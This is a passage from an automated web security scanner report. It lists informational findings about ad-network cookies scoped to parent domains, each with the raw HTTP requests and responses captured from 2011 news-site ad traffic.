GET /ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-87971011_1304949578,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D5044004%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwzOaf7gQQzOaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 13:59:40 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.-cm.ent_l-cm.music_h-ti
...[SNIP]...

9.47. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=18004,21295&remove=14924,17995,17996,17997,17998,17999,18000,18001,18002,18003,37689,38793&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; uuid2=2724386019227846218; anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[; path=/; expires=Sun, 07-Aug-2011 13:59:45 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,........@..L..;

9.48. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; path=/; expires=Sun, 07-Aug-2011 14:01:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:01:24 GMT
Content-Length: 629

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2s
...[SNIP]...

9.49. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt1tr37; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0v9kt00x3g020j0j50j; rdrlst=41i157rlklhm4000000043g0215smlkb5u20000000n3g0215sklkkpqq0000000c3g020hsnlkb5u20000000n3g020m7alkkxrb000000093g020x1blkkpqq0000000c3g020hsplkkpqq0000000c3g020m7flkkyyl000000073g0212gdlkkyy0000000083g020morlkkxrb000000093g021196lkkkbe0000000i3g021195lkkpqh0000000d3g021194lkkjj40000000j3g020dlxlkb5u20000000n3g020znmlk34620000000s3g021193lkkplo0000000f3g021192lkkpke0000000h3g020p46lkkpqq0000000c3g02008slklhm4000000043g020moylkl0r5000000053g020p1blkb5u20000000n3g0210tylkkpku0000000g3g020zr4lkb5u20000000n3g0200bvlk9pe80000000o3g0215xylk60qe0000000r3g0210poljyxb40000000u3g020e6llkl0r5000000053g0210telkd7nq0000000m3g020c9slk9pe80000000o3g0210rdlkdkly0000000k3g020mj2lkkxrb000000093g02159olk8fax0000000p3g020kualkkpqq0000000c3g020m0ulkl0r5000000053g020m45lkl0r5000000053g020m0plkkxrb000000093g020m40lkkxrb000000093g020mjelkkxrb000000093g0212qnlkkplt0000000e3g02167blkl0r5000000053g020bo8lkb5u20000000n3g020mjjlkl0r5000000053g021672lkkxrb000000093g020lw5lkb5u20000000n3g020ycrlkncow000000033g020zaalkb5u20000000n3g021203lkb5u20000000n3g02137rlkkpqq0000000c3g021204lkkyy0000000083g02137qlkb5u20000000n3g020afqlkb5u20000000n3g020o0vlkkpqx0000000b3g020z2ilkkxrb000000093g020ni1lkb5u20000000n3g02; sglst=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; vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zyf; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh13zyf00y3l010k0150k; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwe00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo9000v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Set-Cookie: vstcnt=...[SNIP]...; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:00:04 GMT; Path=/
Location: http://ad.yieldmanager.com/unpixel?t=2&id=1124652&id=726483&id=1274357&id=1230287&id=1097682&id=919037
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT


9.50. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2931142961646634775 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


9.51. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...

9.52. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...

9.53. http://ipcmedia.grapeshot.co.uk/channels.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.grapeshot.co.uk
Path:   /channels.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /channels.cgi?url=http%3A//www.nme.com/news/sufjan-stevens/56527 HTTP/1.1
Host: ipcmedia.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1503275853

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: 600
GSCategories: olympics (10.846109)
GSID: hk7gfe0
GSResponse: OK
GSResponseDetails: C=1 BC=0 BF=0 CU=0 CC=0
GSUID: 1503275853
GSDeployment: nme
Set-Cookie: uid=1503275853; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Connection: close
Content-Type: text/javascript
Content-Length: 114

// Set gs_channels variable for insertion into an advert call
// contextual categories
gs_channels = "olympics";


9.54. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=B08725 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
